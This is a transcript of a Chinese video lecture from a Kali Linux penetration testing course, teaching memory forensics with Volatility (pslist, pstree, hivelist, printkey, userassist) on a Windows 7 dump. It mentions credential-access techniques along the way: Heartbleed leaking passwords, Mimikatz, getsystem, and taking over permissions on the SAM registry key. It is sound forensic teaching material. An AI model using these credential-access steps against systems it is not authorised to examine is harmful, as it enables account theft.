大家好，今天我们来继续进行 Kali Linux 渗透测试第18章的内容。那么在上一个小节里呢，我们已经把这个取证它的一些相关的内容给大家简单做了一下介绍。然后在上一章上一个小节结束之前呢，那么我们已经开始为大家介绍这个取证工具的使用方法了。所以在上一个小节结束之前呢，我们先准备了一台用来被取证的机器。那么它是一台这个 Win7 的电脑。那么我们在这台 Win7 的电脑上面呢，运行一个工具叫做 dump8。那么这个 dump8 运行这个工具之后呢，可以把这台 Windows 系统的内存里面所有的数据给它 dump 下来，然后我们把它拷贝出来，拷贝到一个 Kali 的计算机上，然后我们在 Kali 的这个计算机系统里呢，就可以对这个 dump 下来的文件来进行各种各样的分析了。因为数据都存在这个内存里，那至于通过这些数据信息你能发现什么样的证据，别人是怎么进来的，然后当前系统里有什么恶意程序在运行着等等，做这种事件响应然后取证类的这种分析操作的时候，那么你能分析出多少，这个时候其实我个人对这件事情的认识是，这个过程中其实差异会很大，不同的人你的技术功底，你对系统层面的这个了解有多深入，那么很大程度上会影响到你在这个阶段的这个分析的结果。虽然也有一些个现成的脚本之类的东西，我们可以拿来大幅度的简化我们的工作，但是如果说你没有一个扎实的这种系统层面的这个知识功底的话，这一块东西其实很难分析出什么有价值的信息出来。哪怕你只能取得一些个哪怕你发现一些个这个值得怀疑的很可疑的地方，但是你最终也很难确定说这就是一个问题，这个就是一个不正常的情况，那么这就是一个恶意程序被黑客入侵进来种到我的机器上来，那么你很难拿出一个准确的一个结论出来。所以在这一块呢，我主要给大家介绍的，在 Kali 上面我们做这个内存 dump 文件的分析的时候呢，我主要着重于这个分析工具的使用方法。那么一些个基本的分析使用方法的这个思路性的东西我会给大家介绍一下，但不会把这个大量的这个分析取证过程的场景的这个使用的技巧技能，那么不会涉及特别大量，我只会列一个这个一般性的一个流程。好，那么接下来呢，我们就来打开我们的这个虚拟机，然后因为上一个小节呢，这个我们已经 dump 下来了一台 Win7 电脑的内存内存文件，然后呢，我们这一小节就接下来我们就打开Kali 虚拟机，然后把这个dump 下来的内存文件拷贝进来，然后我们就可以开始来进行分析了。那么这个过程完全是可以离线去操作的。在这里稍微插一句啊，就是我在昨天的时候，那么把这个计算机操作系统Win10升级了一下，然后也把这个VirtualBox 那么这个虚拟机软件做了一下升级。但升级之后呢，就发现我这个 Kali 这台虚拟机呢，就始终是启动启动之后找不到网卡，然后这个问题我搞了大概有1个多小时，快2个小时，最后终于发现是因为这个软件升级之后，不知道为什么我这个网卡这个网络这个配置里面这个勾就被强制的去掉了。那么如果这个勾不勾选的话，那么如果我现在开启Kali的话，可以进入系统没问题，但是没有网卡，找不到网卡，不能联网。那么
如果大家也遇到和我同样的问题的话，那么这个问题我没找到具体原因，但是就是他为什么会把这个勾给我强制取消掉？那么这个我没找到原因，但是发现了就是找到了解决办法，就是你自己把它给强制勾回去，就可以正常启动你的卡里虚拟机了。那如果说我们的同学当中也有使用 VirtualBox， 然后使用 Win10系统，如果你们在版本升级之后，那么如果遇到和我类似这样的情况的话，比如说网卡找不到，那么大家可以到这个位置上来看一下这个勾是否已经被这个升级之后的软件给强制取消掉了。好，那么我们就言归正传，来启动我这个卡里的虚拟机。好，让虚拟机启动着，然后我们先来看 PPT。那么待一会儿虚拟机启动之后呢，那么我们要对这个 dump 下来的这个内存文件来进行分析的时候，我们在卡里下会使用到一个工具，这个工具呢叫做这个 volatility， 那么也就是易失性的这么一个这个直译的话就是容易失去的这么一个英文单词。那么这个工具呢，它几乎是现在我们这个目前在内存分析、内存取证这个领域里面，是一个明星级的产品。那么有专门讲这个内存取证的这个有几本书，那么英文的原版教材，那么大家可以到网上去找一下。那么专门研究内存取证的，那么研究的都是非常深入的。那么基本上主要使用的工具使用的内存分析工具也都是 volatility， 所以这是一款非常重量级、非常 heavy 的这么一款工具。然后因为它的功能过于强大了，所以我在这里只会介绍它最简单、最基本的一些语法和命令的使用，然后更多的这个使用场景，我恐怕在课程里面介绍的内容，就是达不到它的这个1%的这样一个，大概也就是1%它的能力的体现吧。它有更多的非常强大的这个功能，而且还可以有这个扩展的插件。所以这是一款非常值得下功夫。如果大家说哪个同学对这个计算机取证感兴趣的话，那么这是一个你绕不过去的，必须研究的，需要下大力气，花很大的时间花在上面，然后去研究它使用方法的这么一个工具。所以它几乎是一个目前来说最好用的吧，一个内存分析工具。好，那么在卡里当中呢，也已经是默认就集成安装了这款工具了，它叫 volatility， 然后我们就直接执行它就可以了。然后后面呢，它会跟上它自己的这些子命令啊、参数啊等等这样的一些使用方法，就可以从这个内存文件中快速的取得我们想要的这个信息。好，那么下面我们就以这个命令它的一些个常见的使用方法来给大家介绍。它如何来进行内存分析？好，卡里启动之后呢，我们是先把这个内存的 dump 文件给它拷贝到我的卡里虚拟机里面来。这就是我们上一个小节 dump 下来的那个内存文件。然后在 dump 这个内存文件的时候呢，我们已经在Win7这台电脑上面运行了像这个画图工具，然后还运行了计算器等等这个小程序。那么一会儿我们通过对这个内存的 dump 文件的这个分析，可以发现，我们可以在这个 dump 下来的信息里面找到这两个正在运行的进程的信息。好，那么考虑下来之后，我们先来看一下这个7.raw， 那么大概是1个 G 的大小。然后接下来我们就可以来使用这个 volatility 这款工具。那么我们要使用这款工具，那我们可以加个-h 来查看一下它的这个
一些个常见的这个常用的命令参数，我们可以看到它的命令参数非常之多。那么下面这些都是它支持的插件，一会儿我会单独跟大家说插件的事情。然后这些插件我们还可以在这个基础上去进行扩展，也就是说这还不是它所有的插件能提供的这个检测的功能。然后上面还有它的一些个这个选项。比如说这个杠 F， 你要分析哪个文件，你可以通过杠 F 参数来指定这个文件。然后像这个profile， 也就是分析这个内存文件，因为不同的操作系统，它的这个内存结构也会有所不同，所以分析这个不同操作系统提取出来的内存 dump 文件的时候，我们需要告诉这个 volatility。说你现在分析的这个内存文件，它是哪种类型的操作系统的内存文件？比如说它是这个 Win7 SP2 x86 的，或者下一个就是这个 Win7 这个 SP1 x64 的，那么你得明确的告诉他。当然这个工具呢，如果你不知道这个操作系统的具体版本的话，这个工具它也是可以自动的帮你检测出来，这个内存文件。最有可能是哪种类型的操作系统这个的内存 dump 下来的文件。所以我们在具体分析的时候，就是检测之后确定了它大概是哪种类型的操作系统的内存文件之后，然后在分析的时候我们一定要指明说我要用哪个 profile， 也就是哪种操作系统的内存的格式来对这个文件来进行分析。好，那么下面我们就来使用这个 volatility。首先我们要通过杠 F 来指定说我要分析的这个文件是 7.raw。那么因为我现在刚拿到这个文件，我不确定这个文件它是到底是什么操作系统来的，所以我基本上第一个命令总是要这个 image infer 来检查一下，检查这个内存 dump 文件的一些个信息。好，我们运行这条命令。那么后面跟的这个指令呢，其实就是这里面列出来的这些众多的这个插件，我们用哪个插件来对当前这个文件进行检查？这些插件大家都可以去逐个尝试一下，看看每一个插件它的功能都是做什么用的。好，因为这个内存 dump 文件呢有1个 G 这么大，所以它在分析的时候呢，要在其中提取它想要的这个信息，所以检测的时间会这个阶段的检测时间会稍微有点长。好 ，OK， 检查的结果出来了。那么检查的结果告诉我们说，这个他发现这个 profile 呢是 Win7 SP0 64，或者是 Win7 SP1 64，或者是这个2008 SP2 SP0 64 2008 R2 SP1 64，然后大概其是这么几种类型的这个内存文件的这个格式。那么其实也就是说，这几个版本的这个计算机系统的内存文件的格式是比较接近的，所以它们之间是几乎可以通用的。但是因为我们现在清楚说我们拿到内存的那台机器它其实是一个 Win7 SP1 x64 的，所以在这里呢，我们在下面再做进一步对这个文件做分析的时候，那么我们就要指上它最准确的和这个内存格式最准确的那个配置文件的名称。所以指定配置文件呢，我们就用杠杠 profile， 然后等于这个没有逗号。然后另外我们通过这个信息里呢，还可以看见它是否支持 PAE， 然后是否这个它有几个这台计算机，那么有几个这个处理器。那么我们那个虚拟机呢是只有一个 CPU 一个处理器，然后它的这个 Service Pack 版本也就是1，也就是 Service Pack 1 SP1。
然后这是这个 CPU 0 image 的这个内存 dump 文件它的生成的时间。好，那么我们下面几乎所有的这个命令和指令都是基于前面这个先指定文件-f 指定文件名，然后后面通过这个 profile 指定你的这个内存文件它的这个属于哪种类型的操作系统，也就是它的这个内存文件的格式，通过这个指定完了之后，下面我们就可以来对这个内存文件来进行分析一下。那么可能一般来说我们比较感兴趣的就是说当前这个内存里面，我们知道内存里面其实有很多的东西，我们最经常会想到的就是内存里面肯定保存了当前系统正在运行的所有进程的这个进程信息。那么除了这个最基本的之外呢，其实我们说这个内存里面保存的内容非常的大，非常大量。那么操作系统要正常运行，它会把操作系统最主要的一些个功能和组件，那么都会加载到内存里面，这样在运行的时候，为了提高效率，那么也为了保证操作系统的功能能够正常使用，所以操作系统大量的内容都会被加载到这个最核心的内容吧，最核心的内容以及当前正在运行的程序的等等的信息，那么都会被加载到内存里面。包括我们说这个，比如说这个我们这台服务器是这个 HTTPS， 就是一台正数加密的这个网站服务器。那么我们都知道正数加密这个过程是这个使用这个 HTTPS 这个通信这个过程全都是用正数加密的，整个过程全加密，都是密文。但是呢，我们说这个信息在传递过程中它是密文的，但是一旦被服务器端收到，那么这服务器端它就会做解密这样的操作。那么解完密之后的这个数据，就会临时的存在这个内存当中。当然可能是一个时间片段，在某一个时间段里面，那么这个信息会存在内存里面。有的时候这种情况就是这个内存里面保存的这些关键的解了密之后的机密的数据，其实是很大量，而且时间还很长的。包括在这个前2年，我们在这个心脏出血这个漏洞刚被发现出来的时候，其实我们就是利用这个 OpenSSL 它的这个实施上的一个漏洞，可以连到目标这个服务器上，然后直接查看目标服务器的内存。在内存里面就很有可能你会查看到当前正在登录这台服务器的用户他的这个用户名、密码、他的登录信息，甚至这个证书相关的这个信息。包括心脏出血刚出来的时候，那个时候这个整个互联网非常的轰动，然后影响面也是非常之广。当时就有很多人在网上做这个 POC， 做漏洞分析，然后说登录到淘宝的这个服务器上，然后看淘宝服务器上的这个服务器内存，那么当时就能够看到很多用户当前正在登录到淘宝服务器上的这些用户他的这个账号和密码，明文的密码。所以我们说这个内存里保存的东西，因为它不可能已经提取到内存马上就要给 CPU 去做运算计算，或者是写到硬盘里面，所以里面可能会有一些个加密的东西，但是大量的存在的都是一些明文的信息，所以如果能拿到内存信息的话，是一个非常诱人的这么一个信息的来源。好，那么我们还是回来话题，然后先来看一下我们最常使用的一些个这个命令。比如说这个我们说刚才提到说这个内存里面会有这个进程信息，那么查看这个内存 dump 文件里面的这个运行程序的这个进程信息的话，我们可以使用像 PSList， 可以使用这个命令来查看。这其实就是一个插件，这个 PSList 其实就是一个这个volatility 里面的一个插件功能。好，那么通过这个 PSList 呢，我们就能看到，当我们正在对这台机器的内存做这个
做内存 dump 操作的时候，那个当时那么这台机器的内存的这个里面正在运行的这些进程的这个状态。那么后面有这个时间，也就是9月27号，就是前天的时候，那么我们收集的这个信息，然后具体的时间，然后具体有哪些进程，它们的 PID、PPID 以及这个有多少个线程数等等。那么我们在这个做这个内存 dump 信息的时候，那么我们当时是运行了几个小程序的，运行了几个小程序之后，然后才去做的这个内存 dump， 其中就有这个计算器 CALC， 然后当然也有这个 dump8 这个程序自己，那么还有像这个画图工具，那么这都是我们当时正在运行的程序。那么这些正在运行的程序呢，它在系统进程里面有，然后这些信息也都会保存到内存里面，所以我们 dump 下来这个内存文件里面也会包含这些信息。那么除了这个 PSList 之外呢，其实还有一个我们会经常使用的，就是关于这个进程这块的查看的插件，也就是叫 PS Tree。那么这个 PS Tree 呢，其实它是基于 PSList 来写成的，然后它是在 PSList 基础上呢又进了一步。我们现在看到这个 PSList 列出来的进程呢，它有它的 PID 和 PPID。那么 PPID 就是这个 PID 它的副进程 ID。那么我们现在通过数字可以看出来，说这个进程它的副 ID 是这个468这个进程，然后我们可以在这个进程列表里找到这个468这个进程，知道它的这个副 ID 是谁。你一看是 service。但是呢，这么看起来似乎不是特别直观。但如果说我们用这个 PS Tree 的话呢，它就会以一种树形的结构来把谁是副进程，谁是这个子进程，把这种父子关系、继承关系，比较清楚的、直观的显示给我们。比如说这个是这个 service， 那么 service 它是副进程，然后在它下面的这些子进程有这么写，然后当然这是子进程又有子进程。等等等等，我们一看下面有这么多它的这个子进程，所以这样来看呢，这个看起来这个视图上我们就看的会比较清晰的。好，这是这个 PSList 和这个 PS Tree 这两个插件的一些基本使用方法，这样我们就可以查看当时系统进程有哪些正在运行的程序了，有哪些进程了。那如果说这个其中的某一个进程你觉得它很可疑，然后这个那么名称特别奇怪，或者是根据我们后面要给大家介绍的其他的插件判断它有很多可疑的特征的话，那么我们就可以通过这个进程来进一步去调查，说这个进程到底是这个有什么破坏性，然后它哪儿可疑，我们一项一项的把这个证据给它查出来。好，一个是这个系统进程，那么它肯定是存在内存里面的，但是其实还有另外一个操作系统 Windows 操作系统存储信息最关键的地方，那么大部分的这个几乎全部的这个注册表的这个信息，其实也都是在内存里面这个缓存了一份的。那么我们都知道注册表它其实是对应到操作系统上几个这个存放注册表信息的这个文件，我们把这些存放注册表信息的这些文件称之为叫做 have， 也就是这个蜂巢。那么一个蜂巢它有很多个蜂巢，有几个蜂巢共同来形成这个整个注册表的这个信息。所以既然是这个注册表的信息也都这个漏的缓存到了这个内存里面的话，那么我们通过查询内存，其实也可以查询到大量的这台机器这个操作系统它的注册表的信息。那么通过注册表的信息，我们能做很多的事情。比如说我们之前给大家介绍过说，通过注册表的方式，我们可以获取当前这台计算机里面所有用户的这个用户名以及它的哈希值。当然在内存里面我们也可以直接通过像这个 Mimikatz 那样的工具，从内存里直接把这个密码的
这个明文给获取到。所以这个注册表里面的这个信息是这个计算机里面最关键的一些个数据。所以而且有些病毒呢，它会把自己也注射到这个隐藏到注册表里面。所以我们通过去分析内存的话，进而就可以分析到这台计算机的这个注册表，然后注册表里面存在的一些问题、一些隐患的话，我们也可以去发现到，比如说注册表里面被人加了一个恶意的启动项了，或者加了一个这个映射的劫持了等等这样的一些个这个攻击手段和方式，我们都可以通过查询注册表来完成。当然这个过程呢，并不像我说的这个实际的过程，并不像我说的这么的简单轻松。你首先要对注册表的结构有一个比较全面的了解，那么你要查这个内存，你也要对计算机架构，然后对操作系统的这个结构要有一个基本的了解。所以我在这儿呢，我还是强调，我说我只是给大家介绍一下它基本的一个使用的流程，涉及到更多的操作系统的这个内部结构、注册表的内部结构等等，这样的更深层次的这个知识技能的话呢，我就不会在这里给大家过多去介绍了。感兴趣的同学自己可以去研究。那么接下来我就来给大家看一下，如果我想查这台计算机上的这个注册表，它都有，我们说它这个一个注册表是有很多这个所谓的蜂巢来这个共同组成的。那么这台机器上的蜂巢都有哪些个呢？那么我们就可以通过这个 have list 这个插件来获取当前我取得的这个内存 dump 文件，那么对应的那个操作系统，这个内存 dump 文件对应的这个操作系统，它里面的这个注册表的蜂巢文件都有哪些？好，我们用这个 have list 来列出这台计算机上的这个蜂巢文件。我们看到这是 system root， 也就是系统根目录下的这个system 32下的 config 里面有一个 software， 还有这个 default， 还有 security SAM。当然 SAM 一看我们就知道这里面肯定是存这个用户账号信息的，然后还有这个什么 NT user date 等等等等，这一大堆全都是用来存这个注册表信息的这个蜂巢。然后像这个 software 呢，里面就是包含了这台机器上所有的这个已经安装的软件信息。这个软件信息就不只是说我装完操作系统之后又装的 Office 和这个又装的 Photoshop， 不是这个那些第三方的，不只是那些第三方的软件，还包括操作系统自身的一些个软件，比如说操作系统自身的像什么这个计算器啦、写字板啦、这个画图工具啦等等，这些软件信息也都存在这个蜂巢里面。好，那我们知道了这么多的这个有这么多的蜂巢了，然后呢，那接下来我们就可以这个 dump 其中一个蜂巢的这个内容。那么 dump 的时候呢，我们就可以使用这个 have dump， 也就是把这个蜂巢给它 dump 下来。但是我们要有一个提前有一个这个心理准备，就是这个我们说注册表的里面的内容其实很大。这个随着你操作系统不断去安装、配置、修改的话，这注册表里面的内容也会越来越多。那你无论 dump 哪一个蜂巢，无论你是 dump default 这个 security 还是 SAM 还是 software， 那么每一个蜂巢里面对应的内容都会很多，所以我们有可能是一时半会儿都 dump 不完。然后我们在要 dump 哪个蜂巢呢？那么我们是通过，因为我们这个注册表的这个蜂巢信息都是我们通过通过提取内存信息查看到的，所以实际上我们现在检测的是个内存文件，而不是这些真实的注册表的这个蜂巢文件。所以我们要想把这个蜂巢对应存放到内存里面的那些数据都给它 dump 下来的话，那么其实我们是要通过指定这个内存 dump 文件里面的一个内存地址，因为这个蜂巢有这么多个蜂巢，那么这么多个蜂巢呢，它们都把自己加载到系统内存里面，
每一个蜂巢都对应一个这个内存的这个起始地址，说从这块开始就存这个 software 这个蜂巢了，然后从这块这个内存地址开始就存这个 security 这个蜂巢了，然后给它划一块空间，专门用来存这些东西的。那么，所以我们要说 have dump 要 dump 一个蜂巢里面所有的这个信息下来的话呢，我是要通过指定这个内存 dump 文件里面的一个内存地址，那个内存地址呢，就是这个蜂巢对应的存放的内存的这个起始地址。那比如说我们现在要 dump 这个 software 这个蜂巢的话，那么我们就要使用它对应的这个内存地址，而它内存地址呢，就是前面这块。我们看到这个有2个这种地址，有对应这一个蜂巢有2个地址。那么这2个地址呢，分别是这个前面这个地址是这个内存的虚地址。我们知道现在计算机都使用是这种这个虚地址内存空间去进行寻址，然后物理内存呢，这个实际上离我们是相对这个比较遥远一点。通常大家这个直观的认为说我有8G 内存我就用这8G 内存，实际在计算机寻址的时候，它是使用一个虚地址空间来进行这个寻址的，所以它并不能一这个完整准确的对应到这个物理内存的这个地址位置上。所以因为计算机操作系统使用的是虚地址内存空间来进行寻址，所以我们在这个 dump 的时候呢，在这儿也指定的是这个虚内存地址空间的这个地址，所以是指前面这段地址，不要指后面这个。我们这样就 OK 了。大家看我现在的这个内存这个地址啊是很长，这么一大串，但有可能你们自己做实验做练习的时候，你会发现你的那个内存地址这个内存地址这一串字符很短，比我这可能短了一半。那么原因在于说我现在使用的这个我 dump 下来的那个操作系统是 Win7的64位版的。因为64位版的这个地址总线呢，就是2到64次方，而如果说你使用32位操作系统呢，那么就是它的内存地址总线，也就是可寻址的空间就是2的32次方，所以64次方和32次方这差的这个简直是天文数量级的这个差距。所以我们要看到这个64位操作系统它 dump 下来这个内存地址都会比较长，这个大家不要奇怪，这个是没有什么问题，都是正常的现象。好，那么我们下面如果说想 dump 这个 software 这个蜂巢它里面的所有的数据的话，那么我们就通过指定它对应到这个内存 dump 文件里面的这个蜂巢对应的那个内存地址，通过它来进行这个所有软件的这个查询。好，那么我们看一下，这里面有这个Excel， 有 IE， 有这个画图工具，有写字板，有这个 WinWord， 还有这个 WordPad， 也就是这个写字板。然后这个操作系统里面所有的这个些软件的信息在这里面都有。那么有些是这个因为数量太过巨大，有些是我也叫不上名字来的。但是这个计算机里面所有的这个只要在内存在注册表里面留下痕迹的这些应用程序，那么在这里都有。当然会有一些个所谓的绿色版软件，它可能在注册表里面是不留下任何痕迹，不留下任何信息的，那种就不会被查出来。好，因为这个软件的信息量非常之巨大，可能我们要等上5分10分钟也提取不完，所以我们就在这儿只给大家演示一下它基本的这个功能使用方法，让大家知道这个具体你要查什么东西去哪儿查就 OK 了。好，那么这是这个内存的这个你要去 dump 一个这个蜂巢的话，就是注册表的一个蜂巢的话，那你可以这样去操作。大家其实看我这 PPT 里面使用的这个地址呢，就是一个32位版的操作系统 XP 的操作系统的这个内存地址空间的地址，
它就没有像我刚才64位的那个 Win7的内存地址有那么的长，要短很多。这里好，那么我们说，既然这个注册表这些 have 蜂巢我们可以直接去dump 的话，那我是否可以对这个注册表里面的键值的具体的路径、具体位置来进行这个提取呢？那么其实也是可以的。比如说我们比较感兴趣说，我想知道这台计算机里面的这个所有的用户账号，那么我们就可以通过指定它的注册表的这个里面的这个路径。注册表其实我们也可以把它理解成是一个这个数据库的一个存储结构。那么我们只要知道这个我们要找的那个键值，那么它在计算机里面对应的注册表的这个存储的路径，那么我们就可以通过 print key 就是显示注册表里面的一个键值，然后具体是哪个 key 呢？具体哪个键值呢？指定这个。那么这个路径呢，其实我们是可以通过我现在开一台虚拟机啊，比如说拿这 XP 来说吧，这个启动快一点。这个注册表的路径呢，我们都是可以通过这个注册表编辑器来进行查找的。我们首先打开这个注册表编辑器，然后我们看这个 SAM 的 main account user name， 我们看一下这里，这个本机用这个 HK local machine 下面就有这个 SAM。当然现在默认情况下呢，因为这个 Windows 因为这个 SAM 里面存的这个也是对于这台计算机它的这个账号信息，所以对于这台计算机它是一个非常关键、重要、机密的一个信息，你不能谁的打开这个注册表编辑器都能够查看到它，所以默认情况下，这个 SAM 这个节点在注册表里这个节点，那么默认情况下它是连你这个操作系统的管理员都不给你看的权限的。但是呢，我们作为这个操作系统的管理员呢，那么你找到这个位置之后呢，其实你是可以说赋予自己权限的。我默认情况下你不给我看，但是我是管理员，管理员我可以做任何事情，我可以把你原本不给我的那个权限，在这个手动的付给我。好，那做法呢，就是可以点右键，我们选这个权限。你看，默认情况下，这个 administrators 这个管理员组对它是没有读的权限，也没有这个完全控制的权限，也没有什么这个擦除写的权限等等权限都没有。默认情况下就是管理员对它都没有权限，只有一些特殊权限。所谓这些特殊权限，就是我能看到你这些属性，然后这个就是能看到你这些安全选项，你给了别人什么权限，能看到这些东西而已。但是大家可以注意到，这个 system 这个账号默认是对这个 SAM 是这个注册表键值是有完全控制权限的。所以大家可以回想一下，我们在上一章就是讲 Metasploit 的时候，那么我们利用一些个操作系统漏洞，然后直接获取系统 system 权限之后，那么获取 system 权限之后，我们再去这个从注册表里去查这个哈希值啊等等的，就是直接可以查的。如果不是 system 权限的话，你去查那些哈希值就查不到，所以你必须运行 get system， 然后先取得 system 权限。如果 get 不到，那么你是一个普通用户，那你还得先做本地的提权，把自己提成 system。所以这里面 system 和 administrator 权限上还是有这个明显差异的。而当前呢，我现在使用的这个用户账号呢是 YONFH， 那么它是 administrators 这个组里的一个成员，也就是我也是管理员。所以作为管理员呢，虽然你默认这个不给我这个权限，但是我可以自己给自己赋予这个权限。赋予完这个权限呢，那我应该就可以查看里面内容了。一看 OK， 赋予完 SAM 这个权限之后呢，我就可以看到里面这有一个 C 这么一个这个注册表键值了。但是这个内容还是少，还是不够，所以呢，我们继续来查看这个权限。这回我们点高级，然后这个我们现在是给这个 SAM 这个节点本身
赋予了自己权限。但是 SAM 下的那些个还有子件呢，还有一些个子件，那些我们现在还没有权限，所以这个我们还看不到 SAM 下其他那些个这个子件的名称，连名都看不见。对，就对于我们现在这个权限还是完全不可见的，所以我们必须把这个 SAM 这个节点的权限给它强制继承到 SAM 下所有子节点上面去。我再说一遍，把我当前这个用户对 SAM 这个节点的当前的权限，我当前对它的权限已经是完全控制的权限了，我把这个权限强制的继承给这个 SAM 这个节点下的那些子件的这个权限，强制让那些子件继承我这个 SAM 的权限。好，我继续点权限，然后选高级，我们选中这个 Administrators， 然后勾选下面这两个勾，然后点应用。这样的话呢，这将删除所有子对象明确定义的权限，就你子对象原来明确定义的那些权限，不让我管理员看，那些权限我都把它删除掉。删除掉之后，继承 SAM 这个节点它的这个权限是否继续，点试。试完之后，那你也会看到这两个都勾上，那么你会看到这个现在这个新的权限就已经生成了。新的权限生成之后，你会发现 Administrator 全有了 Everyone， 然后什么 Restricted， 然后 System， 然后我们到这儿可以看这个可以看看这个有效权限，就是计算一下我当前这个用户，也就是 YUANFH 这个账号对SAM 这个节点它的这个有效权限，完全控制、查询、设置什么子项、枚举子项等等等等，所有的权限都有了。就你里面这些子节点、子件我也都有了，我又可以删又可以写，这回我才是得到全部的这个权限。好，得到全部权限之后呢，那么我们来刷新一下。好，这样的话我们就能看见下面这些个子件的内容了。而我们现在指定的这个路径呢，就是这个 SAM 下面的这个 domain 下面的 account 这个下面的 user 下面的 name， 在 name 下，其实我们就可以看到这台机器的这几个默认的用户账号，我们就都可以查看到了。但是默认情况下，是我们在注册表里是看不见的。好，那么我们现在呢，说这个我刚才给大家看的这一堆东西啊，其实是为了让大家看到说我是可以通过注册表这个找到这个路径的。那如果说我现在我已经有了这个内存文件了，我已经有了你这台机器内存文件了，内存文件里是有你注册表的这个缓存的内容的，所以我可以通过在你的内存文件里搜这个路径，通过这个路径这一段特征字符，我就可以把这个键值里面的内容给它找出来。所以那具体的命令呢，就是使用这个 print key， 然后加一个大 K 这样的一个参数，然后指定你要找的这个关键字。好，下面来给大家演示一下它的具体使用方法。好，这已经复制完了。7.raw 这是我们要检查的，然后这个 profile， 我们的 profile 是 Win7 的一个 profile， 我们从这儿复制一个。好，这个没问题的。我们要检查7.raw 这个文件，然后它的 profile 是Win7SP164 print key 杠 K 显示这个注册表键值。那么因为你现在已经缓存到内存里，我现在把你的内存拿过来，那现在我再去查你对我都是这个坦白的，就是直接我都能看的，我不再需要像刚才在 XP 里面设置那一大堆的权限才能看的。
那么这样来看这个键值。当然你可以查任何的注册表里的键值，你只要知道它的路径啊等等这个关键词都可以去查。好，这几个 administrator guest， 然后这个分期 OK， 这样的话我们就可以查这台机器上所有的这个账号。当然我们可以看到这里面这个查的这几个账号呢，和我们在 XT 下看到的还是稍微有点区别，就是 XT 下还有两个这个系统还有这两个就是这个系统的这个辅助账号。那么这两个账号平时在不使用的时候是没有缓存到内存里，所以它既然不缓存到内存里，那么我们在内存里找的时候也就找不到了。所以这个还是有点差别。但是这个普通用户账号还有管理员的 guest 的这些账号肯定是都有的。好，那么既然知道所有账号了，那我就想知道，如果我们现在查呢是这个 administrator 和 W7 这两个账号，那么我们想知道，如果说这台机器有多个账号的话，有10个8个账号，那你想知道说这个这台机器的使用者他最常使用哪个账号去登录呢？然后这个或者说这个我在这个 dump 这个内存的时候，把这个内存 dump 下来的时候，那我当前那个登录的用户，也就是最后登录这台机器的这个用户账号是哪个账号？那我如果说想查这个信息的话，比如说这有 Win7 有 W7 W8 W9 一大堆10几个账号，那我想知道最后一个登录这台机器的账号是哪个账号，那么那个账号它在这台机器上都运行过哪些东西，那么稍后我们也都有办法去查到的。好，那么我们就可以使用这个还是 print-key， 也是通过查注册表的方式，查注册表里的一个键值，然后通过这个键值我们就可以知道这个最后一个登录这台计算机的那个用户是谁。好，这个注册表键值呢就是 software Microsoft Windows NT current version logon 这个键值记录的就是当前正在登录的用户，也就是我做 dump8 执行这个程序的那个当时登录这台机器的那个用户，也就是所谓的我们说的最后一个登录的用户了。好，这儿获取出来的信息呢会有点多，然后大家需要去分辨一下，并不是那么直观，说一下就拿来最直接的这个内容。我们从上往下看吧，我们看这是最后登录的用户他会使用到的一些个这个系统的文件以及系统路径。那么这个 key 名是 logon， 说明这个用户登录了。但是看这个用户名呢，这个用户名叫 network service， 这是一个系统用户，所以我们想找的这个用户账号不是它。另外我们刚才已经查出这台机器里只有这3个账号，一个 guest， 一个 administrator， 一个 W7。那么我们就在这些用户名里面找这3个用户名，在现在查出来这些数据里面找这3个用户名就 OK 了。这个 local service 这也是一个这个系统用户，所以它不是普通用户账号。然后这个 MS Circle 这一看就是这个 Circle Server 创建的系统账号，所以这也不是。然后下面这也不是，然后这儿 users 下的这个 W7， 然后我们看看没有其他的这个用户名上了，那就可以判断我们是这个用户是这个最后登录这台机器的这个用户。然后这个last update 这个时间不是说最后登录的时间，而是说这个用户 W7 这个用户最后我们对这个用户进行修改，比如说改他的密码，改他的用户名，对这个账号进行修改的时间，所以它是 update 的时间。所以这个时间大家注意啊，它不是最后登录这个计算机的时间。那么如果你想查最后登录的这个计算机的时间呢，那么可以使用下面这个命令。那么这个也是一个插件的名称，叫做 user assistance， 叫什么？简单就叫用户助理吧。这个用户助理这个插件呢很有意思，它
不仅可以显示说最后我们用户登录的时间，然后同时它还可以显示说我这个用户在这台机器上都运行了哪些程序，然后有哪些程序是正在运行的，然后运行这些程序呢，这个都运行了多少次，就是你运行了，比如说运行 IE 运行多少次，居然操作系统里面还有一个地方是用来记这个信息的，所以这个是个挺好玩的这么一个建制。然后下面呢，我们就来给大家演示一下这个插件它的使用方法。前面这些都不变，这个F 7点 raw， 然后这个 profile 这些都不变。然后我们这回使用的是 user assist 这个插件，回车，这个查出来的信息也会比较多。还有 OK 完成了。完成了之后，我们从下往上看吧，因为太多了，我只能给大家简单的看几个了。比如说我运行过这个程序，那么这是一个快捷方式，这个什么 handbrake LNK， 这是一个这个快捷方式。具体这个快捷方式对应什么程序，我已经不记得了 ，handbrake 想不起来这是什么程序。然后我运行这个程序呢，运行过2次。然后最后一次这个运行的时间是15年啊，已经1年多没用过它了。然后这儿也有一个 handbrake， 还有这个什么这个 Cam Studio， 这个就是我们这个整个所有这门课程录制这个课程使用的那个录像软件，那么就是使用的这个软件。那么这个软件我只在这个Win7那台虚拟机里面运行过1次，然后最后运行时间也是15年运行的，后来就没在里面再运行过。然后这个OmniPeak 这是那个抓包工具，然后我在这台机器上运行过9次，最后运行时间也是15年了。然后还有像这个 AWS 扫描器我运行过这个7次。然后还有这个 IE 运行的次数就多了，有运行了18次。然后这个 NetSpark 这也是一个扫描器，然后这个运行了8次。然后这个HeavyG， 那么这是一个这个 SQL 注入漏洞的一个自动化的利用工具，那么我运行过5次。然后这个 Windows Explorer， 这个 Explorer 就是这个系统管理器，那么这个 Explorer 进程，也就是其实你我启动这台机器，进入这个系统就会这个运行1次 Explorer 现在已经运行过这个30次了。然后还有等等，这个凡是我在这台机器上运行过的程序，那么在这里都有记录。远程桌面我去连别人远程桌面，用这个连接工具运行过6次。然后用什么系统传真扫描，然后这个画图，然后这个截图，桌面截图工具，然后这个记事的那个便签儿，然后这个计算器等等，每一个程序，每一个我运行过的程序在这儿都有记录。好，大概就是这些吧。通过查这些信息呢，你就会知道这台机器上都运行过哪些东西，哪些东西是这个运行的最频繁的，然后这里面有没有一些是可疑的啊？比如说你遇到了一个说这个程序我没见过，然后它处在一个很奇怪的路径里面，那这有可能就是一个线索，所以你就有必要去仔细查一下，说这个程序它到底有没有问题。那么通过查这些东西呢，我们都可以搜集到大量的信息，还有什么 WPS 运行过2次。好，那么这是又一个这个插件。好，我们接着往下看，这里面还有其他的插件。
